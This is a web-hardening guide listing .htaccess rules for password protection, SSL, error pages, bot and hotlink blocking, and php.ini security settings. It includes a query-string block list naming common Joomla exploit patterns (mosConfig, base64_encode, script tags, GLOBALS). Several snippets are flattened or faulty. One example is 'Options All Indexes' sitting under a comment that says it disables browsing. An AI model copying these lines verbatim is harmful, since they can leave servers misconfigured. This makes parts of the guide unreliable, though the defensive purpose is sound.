List of Critical Settings
Following is the list of critical settings regarding .htaccess and php.ini files:
.htaccess
Rule one: Password-protect a single file.
# password-protect single file <Files secure.php> AuthType Basic AuthName "Prompt" AuthUserFile /home/path/.htpasswd Require valid-user </Files>
Rule two: Use FilesMatch to password-protect multiple files.
# password-protect multiple files <FilesMatch "^(execute|index|secure|insanity|biscuit)*$"> AuthType basic AuthName "Development" AuthUserFile /home/path/.htpasswd Require valid-user </FilesMatch>
Rule three: Password-protect a directory, in this case the one containing .htaccess.
# password-protect the directory in which this .htaccess rule resides AuthType basic AuthName "This directory is protected" AuthUserFile /home/path/.htpasswd AuthGroupFile /dev/null Require valid-user
Rule Four: Password-protect against all IPs except the one you specify.
# password-protect directory for every IP except the one specified # place in htaccess file of a directory to protect that entire directory AuthType Basic AuthName "Personal" AuthUserFile /home/path/.htpasswd Require valid-user Allow from 99.88.77.66 Satisfy Any # password prompt for visitors AuthType basic AuthName "This site is currently under construction" AuthUserFile /home/path/.htpasswd AuthGroupFile /dev/null Require valid-user # allow webmaster and any others open access Order Deny, Allow Deny from all # the allow from below could be your IP to make it easier to get in Allow from 111.222.33.4 Allow from favorite.validation/services/ Allow from googlebot.com Satisfy Any
Activate SSL via .htaccess:
# require SSL SSLOptions +StrictRequire SSLRequireSSL SSLRequire %{HTTP_HOST} eq "domain.tld" ErrorDocument 403 https://domain.tld
# require SSL without mod_ssl RewriteCond %{HTTPS}! =on [NC] RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [R,L]
Custom error page and error messages:
# serve custom error pages ErrorDocument 400 /errors/400.html ErrorDocument 401 /errors/401.html ErrorDocument 403 /errors/403.html ErrorDocument 404 /errors/404.html ErrorDocument 500 /errors/500.html
# provide a universal error document RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^.*$ /dir/error.php [L]
# deny access to bad robots site rippers offline browsers RewriteBase / RewriteCond %{HTTP_USER_AGENT} ^Anarchie [OR] RewriteCond %{HTTP_USER_AGENT} ^ASPSeek [OR] RewriteCond %{HTTP_USER_AGENT} ^attach [OR] RewriteCond %{HTTP_USER_AGENT} ^autoemailspider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Xenu [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.* - [F,L]
# send visitor to site of your choice RewriteRule ^.*$ http://www.hellish-website.com [R,L]
# send the bad guys to a virtual black hole of fake email addresses RewriteRule ^.*$ http://english-61925045732.spampoison.com [R,L]
# stop hotlinking and serve alternate content
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com/.*$ [NC]
RewriteRule .*\.(gif|jpg)$ http://www.domain.com/donotsteal.jpg [R,NC,L]
</ifModule>
# block a partial domain via network/netmask values deny from 99.1.0.0/255.255.0.0
# block a single domain deny from 99.88.77.66
# Block two unique IP addresses deny from 99.88.77.66 11.22.33.44 # block three ranges of IP addresses deny from 99.88 99.88.77 11.22.33
In the following example, all IP addresses are allowed access except for 12.345.67.890 and domain.com:
# allow all except those indicated here <Limit GET POST PUT> order allow,deny allow from all deny from 12.345.67.890 deny from .*domain\.com.* </Limit> # Disable directory browsing Options All Indexes # prevent viewing of a specific file <files secretfile.doc> order allow, deny deny from all </files> # prevent display of select file types IndexIgnore *.wmv *.mp4 *.avi *.etc
Make sure your
.htaccess
contains this entry:
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
########### End - Rewrite rules to block out some common exploits
php. ini
Settings you should make in your php.ini file:
register_globals = off (or =0)
allow_url_fopen = off
define( 'RG_EMULATION', 0 )
Turn off PHP version information:
expose_php = 0
Disable file uploads (CAUTION: It may affect some extensions):
file_uploads=off
Prevent or lower the possibility of a session fixation attack:
session.use_trans_sid = off
References to Learn More about php.ini
http://shiflett.org: Chris is the author of PHP and Web Application Secutiry, a must read.
http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks
